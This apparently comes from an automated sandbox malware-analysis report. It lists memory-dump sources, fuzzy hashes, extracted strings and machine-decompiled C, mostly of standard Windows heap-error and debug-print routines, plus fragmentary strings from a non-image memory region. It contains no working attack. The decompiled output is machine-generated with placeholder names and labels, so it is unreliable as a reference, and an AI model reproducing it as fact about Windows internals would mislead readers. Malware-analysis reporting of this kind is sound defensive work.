                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Strings
                                                                                                                                    • read from, xrefs: 04BEB4AD, 04BEB4B2
                                                                                                                                    • The resource is owned shared by %d threads, xrefs: 04BEB37E
                                                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04BEB484
                                                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 04BEB432
                                                                                                                                    • *** enter .cxr %p for the context, xrefs: 04BEB50D
                                                                                                                                    • *** enter .exr %p for the exception record, xrefs: 04BEB4F1
                                                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 04BEB374
                                                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04BEB476
                                                                                                                                    • The instruction at %p tried to %s , xrefs: 04BEB4B6
                                                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 04BEB3C5
                                                                                                                                    • *** Inpage error in %ws:%s, xrefs: 04BEB418
                                                                                                                                    • This failed because of error %Ix., xrefs: 04BEB446
                                                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04BEB305
                                                                                                                                    • *** then kb to get the faulting stack, xrefs: 04BEB51C
                                                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 04BEB48F
                                                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04BEB53F
                                                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BEB38F
                                                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04BEB47D
                                                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04BEB2F3
                                                                                                                                    • an invalid address, %p, xrefs: 04BEB4CF
                                                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 04BEB352
                                                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04BEB314
                                                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04BEB2DC
                                                                                                                                    • a NULL pointer, xrefs: 04BEB4E0
                                                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BEB3D6
                                                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04BEB323
                                                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04BEB39B
                                                                                                                                    • <unknown>, xrefs: 04BEB27E, 04BEB2D1, 04BEB350, 04BEB399, 04BEB417, 04BEB48E
                                                                                                                                    • write to, xrefs: 04BEB4A6
                                                                                                                                    • The critical section is owned by thread %p., xrefs: 04BEB3B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                    • API String ID: 0-108210295
                                                                                                                                    • Opcode ID: 357860330c9e197e2dcfa66ba5841bfb96747196e6080ec59ed91260b4b5224e
                                                                                                                                    • Instruction ID: d2083c5fa3328013991504ef3cb3afe06126cabff0d67c11e97ed521d4d2d2c8
                                                                                                                                    • Opcode Fuzzy Hash: 357860330c9e197e2dcfa66ba5841bfb96747196e6080ec59ed91260b4b5224e
                                                                                                                                    • Instruction Fuzzy Hash: 7981F975644220FFEB21AA0ACD8AD7B3B3AEF86756F4040C9F5082B122D361F551DB76
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                    			E04BF1C06() {
                                                                                                                                    				signed int _t27;
                                                                                                                                    				char* _t104;
                                                                                                                                    				char* _t105;
                                                                                                                                    				intOrPtr _t113;
                                                                                                                                    				intOrPtr _t115;
                                                                                                                                    				intOrPtr _t117;
                                                                                                                                    				intOrPtr _t119;
                                                                                                                                    				intOrPtr _t120;
                                                                                                                                    
                                                                                                                                    				_t105 = 0x4b148a4;
                                                                                                                                    				_t104 = "HEAP: ";
                                                                                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    					_push(_t104);
                                                                                                                                    					E04B3B150();
                                                                                                                                    				} else {
                                                                                                                                    					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    				}
                                                                                                                                    				_push( *0x4c2589c);
                                                                                                                                    				E04B3B150("Heap error detected at %p (heap handle %p)\n",  *0x4c258a0);
                                                                                                                                    				_t27 =  *0x4c25898; // 0x0
                                                                                                                                    				if(_t27 <= 0xf) {
                                                                                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M04BF1E96))) {
                                                                                                                                    						case 0:
                                                                                                                                    							_t105 = "heap_failure_internal";
                                                                                                                                    							goto L21;
                                                                                                                                    						case 1:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 2:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 3:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 4:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 5:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 6:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 7:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 8:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 9:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xa:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xb:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xc:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xd:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xe:
                                                                                                                                    							goto L21;
                                                                                                                                    						case 0xf:
                                                                                                                                    							goto L21;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L21:
                                                                                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    					_push(_t104);
                                                                                                                                    					E04B3B150();
                                                                                                                                    				} else {
                                                                                                                                    					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    				}
                                                                                                                                    				_push(_t105);
                                                                                                                                    				E04B3B150("Error code: %d - %s\n",  *0x4c25898);
                                                                                                                                    				_t113 =  *0x4c258a4; // 0x0
                                                                                                                                    				if(_t113 != 0) {
                                                                                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    						_push(_t104);
                                                                                                                                    						E04B3B150();
                                                                                                                                    					} else {
                                                                                                                                    						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    					}
                                                                                                                                    					E04B3B150("Parameter1: %p\n",  *0x4c258a4);
                                                                                                                                    				}
                                                                                                                                    				_t115 =  *0x4c258a8; // 0x0
                                                                                                                                    				if(_t115 != 0) {
                                                                                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    						_push(_t104);
                                                                                                                                    						E04B3B150();
                                                                                                                                    					} else {
                                                                                                                                    						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    					}
                                                                                                                                    					E04B3B150("Parameter2: %p\n",  *0x4c258a8);
                                                                                                                                    				}
                                                                                                                                    				_t117 =  *0x4c258ac; // 0x0
                                                                                                                                    				if(_t117 != 0) {
                                                                                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    						_push(_t104);
                                                                                                                                    						E04B3B150();
                                                                                                                                    					} else {
                                                                                                                                    						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    					}
                                                                                                                                    					E04B3B150("Parameter3: %p\n",  *0x4c258ac);
                                                                                                                                    				}
                                                                                                                                    				_t119 =  *0x4c258b0; // 0x0
                                                                                                                                    				if(_t119 != 0) {
                                                                                                                                    					L41:
                                                                                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    						_push(_t104);
                                                                                                                                    						E04B3B150();
                                                                                                                                    					} else {
                                                                                                                                    						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    					}
                                                                                                                                    					_push( *0x4c258b4);
                                                                                                                                    					E04B3B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c258b0);
                                                                                                                                    				} else {
                                                                                                                                    					_t120 =  *0x4c258b4; // 0x0
                                                                                                                                    					if(_t120 != 0) {
                                                                                                                                    						goto L41;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                                                    					_push(_t104);
                                                                                                                                    					E04B3B150();
                                                                                                                                    				} else {
                                                                                                                                    					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                    				}
                                                                                                                                    				return E04B3B150("Stack trace available at %p\n", 0x4c258c0);
                                                                                                                                    			}











                                                                                                                                    0x04bf1db0
                                                                                                                                    0x04bf1db1
                                                                                                                                    0x04bf1db7
                                                                                                                                    0x04bf1dc2
                                                                                                                                    0x04bf1de1
                                                                                                                                    0x04bf1de2
                                                                                                                                    0x04bf1dc4
                                                                                                                                    0x04bf1dd9
                                                                                                                                    0x04bf1dde
                                                                                                                                    0x04bf1df3
                                                                                                                                    0x04bf1df9
                                                                                                                                    0x04bf1dfa
                                                                                                                                    0x04bf1e00
                                                                                                                                    0x04bf1e0a
                                                                                                                                    0x04bf1e13
                                                                                                                                    0x04bf1e32
                                                                                                                                    0x04bf1e33
                                                                                                                                    0x04bf1e15
                                                                                                                                    0x04bf1e2a
                                                                                                                                    0x04bf1e2f
                                                                                                                                    0x04bf1e39
                                                                                                                                    0x04bf1e4a
                                                                                                                                    0x04bf1e02
                                                                                                                                    0x04bf1e02
                                                                                                                                    0x04bf1e08
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf1e08
                                                                                                                                    0x04bf1e5b
                                                                                                                                    0x04bf1e7a
                                                                                                                                    0x04bf1e7b
                                                                                                                                    0x04bf1e5d
                                                                                                                                    0x04bf1e72
                                                                                                                                    0x04bf1e77
                                                                                                                                    0x04bf1e95

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                    • API String ID: 0-2897834094
                                                                                                                                    • Opcode ID: 7584d7b1be7a12ce0b200817113b790b03c5f42e32fcb27c8cfbb99aa7bb0c08
                                                                                                                                    • Instruction ID: 86a1ac01667e9856b3dd97735529b04dae19e383adf5a1d62dd8f50cc9fdd294
                                                                                                                                    • Opcode Fuzzy Hash: 7584d7b1be7a12ce0b200817113b790b03c5f42e32fcb27c8cfbb99aa7bb0c08
                                                                                                                                    • Instruction Fuzzy Hash: 7F61323B674551DFE2119B8EDA84E2533A4EB00A31B0888EBF60D5F315E6B4FC559E0A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: A$P$P$R$T$Vi$Vi$Z$Zw$c$mina$mo$msi$o$oM$oc$oc$ss$ua$ua$y
                                                                                                                                    • API String ID: 0-2990349263
                                                                                                                                    • Opcode ID: 2c4eb0efb3224e5c3ff9a369fc8e3c2221b6254002007da644927c78682e5486
                                                                                                                                    • Instruction ID: f76f8dfd024ae77b377e6fbb8ebfd48c9a71240879913d6ef0dbadf860860e01
                                                                                                                                    • Opcode Fuzzy Hash: 2c4eb0efb3224e5c3ff9a369fc8e3c2221b6254002007da644927c78682e5486
                                                                                                                                    • Instruction Fuzzy Hash: D1B1687211D3809EE361CB688845B9FBBE4FF95704F04491EF5C887292E7B58648CB67
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E04B3B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                                                                                    				signed int _t65;
                                                                                                                                    				signed short _t69;
                                                                                                                                    				intOrPtr _t70;
                                                                                                                                    				signed short _t85;
                                                                                                                                    				void* _t86;
                                                                                                                                    				signed short _t89;
                                                                                                                                    				signed short _t91;
                                                                                                                                    				intOrPtr _t92;
                                                                                                                                    				intOrPtr _t97;
                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                    				signed short _t99;
                                                                                                                                    				signed short _t101;
                                                                                                                                    				void* _t102;
                                                                                                                                    				char* _t103;
                                                                                                                                    				signed short _t104;
                                                                                                                                    				intOrPtr* _t110;
                                                                                                                                    				void* _t111;
                                                                                                                                    				void* _t114;
                                                                                                                                    				intOrPtr* _t115;
                                                                                                                                    
                                                                                                                                    				_t109 = __esi;
                                                                                                                                    				_t108 = __edi;
                                                                                                                                    				_t106 = __edx;
                                                                                                                                    				_t95 = __ebx;
                                                                                                                                    				_push(0x90);
                                                                                                                                    				_push(0x4c0f7a8);
                                                                                                                                    				E04B8D0E8(__ebx, __edi, __esi);
                                                                                                                                    				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                                                                                    				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                                                                                    				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                                                                                    				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                                                                                    				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                                                                                    				if(__edx == 0xffffffff) {
                                                                                                                                    					L6:
                                                                                                                                    					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                                                                                    					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                                                                                    					__eflags = _t65 & 0x00000002;
                                                                                                                                    					if((_t65 & 0x00000002) != 0) {
                                                                                                                                    						L3:
                                                                                                                                    						L4:
                                                                                                                                    						return E04B8D130(_t95, _t108, _t109);
                                                                                                                                    					}
                                                                                                                                    					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                                                                                    					_t108 = 0;
                                                                                                                                    					_t109 = 0;
                                                                                                                                    					_t95 = 0;
                                                                                                                                    					__eflags = 0;
                                                                                                                                    					while(1) {
                                                                                                                                    						__eflags = _t95 - 0x200;
                                                                                                                                    						if(_t95 >= 0x200) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						E04B7D000(0x80);
                                                                                                                                    						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                                                    						_t108 = _t115;
                                                                                                                                    						_t95 = _t95 - 0xffffff80;
                                                                                                                                    						_t17 = _t114 - 4;
                                                                                                                                    						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                                                    						__eflags =  *_t17;
                                                                                                                                    						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                                    						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                                                    						_t102 = _t110 + 1;
                                                                                                                                    						do {
                                                                                                                                    							_t85 =  *_t110;
                                                                                                                                    							_t110 = _t110 + 1;
                                                                                                                                    							__eflags = _t85;
                                                                                                                                    						} while (_t85 != 0);
                                                                                                                                    						_t111 = _t110 - _t102;
                                                                                                                                    						_t21 = _t95 - 1; // -129
                                                                                                                                    						_t86 = _t21;
                                                                                                                                    						__eflags = _t111 - _t86;
                                                                                                                                    						if(_t111 > _t86) {
                                                                                                                                    							_t111 = _t86;
                                                                                                                                    						}
                                                                                                                                    						E04B7F3E0(_t108, _t106, _t111);
                                                                                                                                    						_t115 = _t115 + 0xc;
                                                                                                                                    						_t103 = _t111 + _t108;
                                                                                                                                    						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                                                    						_t89 = _t95 - _t111;
                                                                                                                                    						__eflags = _t89;
                                                                                                                                    						_push(0);
                                                                                                                                    						if(_t89 == 0) {
                                                                                                                                    							L15:
                                                                                                                                    							_t109 = 0xc000000d;
                                                                                                                                    							goto L16;
                                                                                                                                    						} else {
                                                                                                                                    							__eflags = _t89 - 0x7fffffff;
                                                                                                                                    							if(_t89 <= 0x7fffffff) {
                                                                                                                                    								L16:
                                                                                                                                    								 *(_t114 - 0x94) = _t109;
                                                                                                                                    								__eflags = _t109;
                                                                                                                                    								if(_t109 < 0) {
                                                                                                                                    									__eflags = _t89;
                                                                                                                                    									if(_t89 != 0) {
                                                                                                                                    										 *_t103 = 0;
                                                                                                                                    									}
                                                                                                                                    									L26:
                                                                                                                                    									 *(_t114 - 0xa0) = _t109;
                                                                                                                                    									 *(_t114 - 4) = 0xfffffffe;
                                                                                                                                    									__eflags = _t109;
                                                                                                                                    									if(_t109 >= 0) {
                                                                                                                                    										L31:
                                                                                                                                    										_t98 = _t108;
                                                                                                                                    										_t39 = _t98 + 1; // 0x1
                                                                                                                                    										_t106 = _t39;
                                                                                                                                    										do {
                                                                                                                                    											_t69 =  *_t98;
                                                                                                                                    											_t98 = _t98 + 1;
                                                                                                                                    											__eflags = _t69;
                                                                                                                                    										} while (_t69 != 0);
                                                                                                                                    										_t99 = _t98 - _t106;
                                                                                                                                    										__eflags = _t99;
                                                                                                                                    										L34:
                                                                                                                                    										_t70 =  *[fs:0x30];
                                                                                                                                    										__eflags =  *((char*)(_t70 + 2));
                                                                                                                                    										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                                                    											L40:
                                                                                                                                    											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                                                    											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                                                    											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                                                    											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                                                    											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                                                    											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                                                    											 *(_t114 - 4) = 1;
                                                                                                                                    											_push(_t114 - 0x74);
                                                                                                                                    											L04B8DEF0(_t99, _t106);
                                                                                                                                    											 *(_t114 - 4) = 0xfffffffe;
                                                                                                                                    											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                                    											goto L3;
                                                                                                                                    										}
                                                                                                                                    										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                                                    										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                                                    											goto L40;
                                                                                                                                    										}
                                                                                                                                    										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                                    										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                                                    										_push(_t99 & 0x0000ffff);
                                                                                                                                    										_push(_t108);
                                                                                                                                    										_push(1);
                                                                                                                                    										_t101 = E04B7B280();
                                                                                                                                    										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                                                    										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                                                    											__eflags = _t101 - 0x80000003;
                                                                                                                                    											if(_t101 == 0x80000003) {
                                                                                                                                    												E04B7B7E0(1);
                                                                                                                                    												_t101 = 0;
                                                                                                                                    												__eflags = 0;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                                                    										goto L4;
                                                                                                                                    									}
                                                                                                                                    									__eflags = _t109 - 0x80000005;
                                                                                                                                    									if(_t109 == 0x80000005) {
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								 *(_t114 - 0x90) = 0;
                                                                                                                                    								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                                                                    								_t91 = E04B7E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                                                                    								_t115 = _t115 + 0x10;
                                                                                                                                    								_t104 = _t91;
                                                                                                                                    								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                                                                    								__eflags = _t104;
                                                                                                                                    								if(_t104 < 0) {
                                                                                                                                    									L21:
                                                                                                                                    									_t109 = 0x80000005;
                                                                                                                                    									 *(_t114 - 0x90) = 0x80000005;
                                                                                                                                    									L22:
                                                                                                                                    									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                                                                    									L23:
                                                                                                                                    									 *(_t114 - 0x94) = _t109;
                                                                                                                                    									goto L26;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t104 - _t92;
                                                                                                                                    								if(__eflags > 0) {
                                                                                                                                    									goto L21;
                                                                                                                                    								}
                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                    									goto L22;
                                                                                                                                    								}
                                                                                                                                    								goto L23;
                                                                                                                                    							}
                                                                                                                                    							goto L15;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t109;
                                                                                                                                    					if(_t109 >= 0) {
                                                                                                                                    						goto L31;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t109 - 0x80000005;
                                                                                                                                    					if(_t109 != 0x80000005) {
                                                                                                                                    						goto L31;
                                                                                                                                    					}
                                                                                                                                    					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                                                                    					_t38 = _t95 - 1; // -129
                                                                                                                                    					_t99 = _t38;
                                                                                                                                    					goto L34;
                                                                                                                                    				}
                                                                                                                                    				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                                                    					__eflags = __edx - 0x65;
                                                                                                                                    					if(__edx != 0x65) {
                                                                                                                                    						goto L2;
                                                                                                                                    					}
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    				L2:
                                                                                                                                    				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                                                    				_push(_t106);
                                                                                                                                    				if(E04B7A890() != 0) {
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    				goto L3;
                                                                                                                                    			}






















                                                                                                                                    0x04b949b3
                                                                                                                                    0x04b948f8
                                                                                                                                    0x04b948fe
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948fe
                                                                                                                                    0x04b94895
                                                                                                                                    0x04b9489c
                                                                                                                                    0x04b948ad
                                                                                                                                    0x04b948b2
                                                                                                                                    0x04b948b5
                                                                                                                                    0x04b948b7
                                                                                                                                    0x04b948ba
                                                                                                                                    0x04b948bc
                                                                                                                                    0x04b948c6
                                                                                                                                    0x04b948c6
                                                                                                                                    0x04b948cb
                                                                                                                                    0x04b948d1
                                                                                                                                    0x04b948d4
                                                                                                                                    0x04b948d8
                                                                                                                                    0x04b948d8
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948d8
                                                                                                                                    0x04b948be
                                                                                                                                    0x04b948c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948c2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b948c4
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94882
                                                                                                                                    0x04b9487b
                                                                                                                                    0x04b94904
                                                                                                                                    0x04b94906
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94908
                                                                                                                                    0x04b9490e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94910
                                                                                                                                    0x04b94917
                                                                                                                                    0x04b94917
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94917
                                                                                                                                    0x04b3b1ba
                                                                                                                                    0x04b947f9
                                                                                                                                    0x04b947fc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b947fc
                                                                                                                                    0x04b3b1c0
                                                                                                                                    0x04b3b1c0
                                                                                                                                    0x04b3b1c3
                                                                                                                                    0x04b3b1cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _vswprintf_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 677850445-0
                                                                                                                                    • Opcode ID: ad30d69eba283a564da7160d20308e6f34288db024fa39e8c7908ba3478e737e
                                                                                                                                    • Instruction ID: 5e6ae87dc6d99d29b74c54d83b97c9e8e040404a7106f9a97ba371720ecee874
                                                                                                                                    • Opcode Fuzzy Hash: ad30d69eba283a564da7160d20308e6f34288db024fa39e8c7908ba3478e737e
                                                                                                                                    • Instruction Fuzzy Hash: 5C51CD71E182598EEF30CF648884BAEBBF0EF00714F1041FDD869AB281D7706D469B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E04B5B944(signed int* __ecx, char __edx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				char _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				char _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				signed int* _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
